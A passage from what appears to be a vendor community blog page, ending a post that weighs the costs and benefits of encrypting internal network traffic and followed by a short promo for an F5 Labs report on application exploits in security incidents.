is decrypted before being channeled through the solutions. Encryption hides data from prying eyes, it does nothing to ensure the legitimacy of the data. Simply initiating a policy of “all data on all networks must be secured via encryption” does not make an organization more secure and in fact it may lead to a less secure organization as it becomes more difficult and costly to implement security solutions designed to dig deeper into the data and ensure it is legitimate traffic free of taint or malicious intent. Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data. The “bottom line” is everyone with confidential data to protect – which is just about every IT organization out there – needs to understand the ramifications of enabling encryption across the internal network both technically and from a cost/management perspective. Encryption of data on internal networks is not a bad thing to do at all but it is also not a panacea. The benefits of implementing internal encryption need to be weighed against the costs and balanced with risk and not simply tossed blithely over the network like a security blanket. PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing The Real Meaning of Cloud Security Revealed The Unpossible Task of Eliminating Risk Damned if you do, damned if you don't The IT Security Flowchart802Views0likes1CommentThe State of the State of Application Exploits in Security Incidents (SoSo Report)
Cybersecurity is always about perspective, and that is doubly true when talking about the rapidly changing field of application security. With The State of the State of Application Exploits in Security Incidents, F5 Labs & Cyentia Institute provide a more complete view of the application security elephant. We examine published industry reports from multiple sources for a better understanding of the frequency and role of application exploits. So, let’s start the clock to learn more about the affectionately named, SoSo Report. Get your copy at F5 Labs727Views0likes0Comments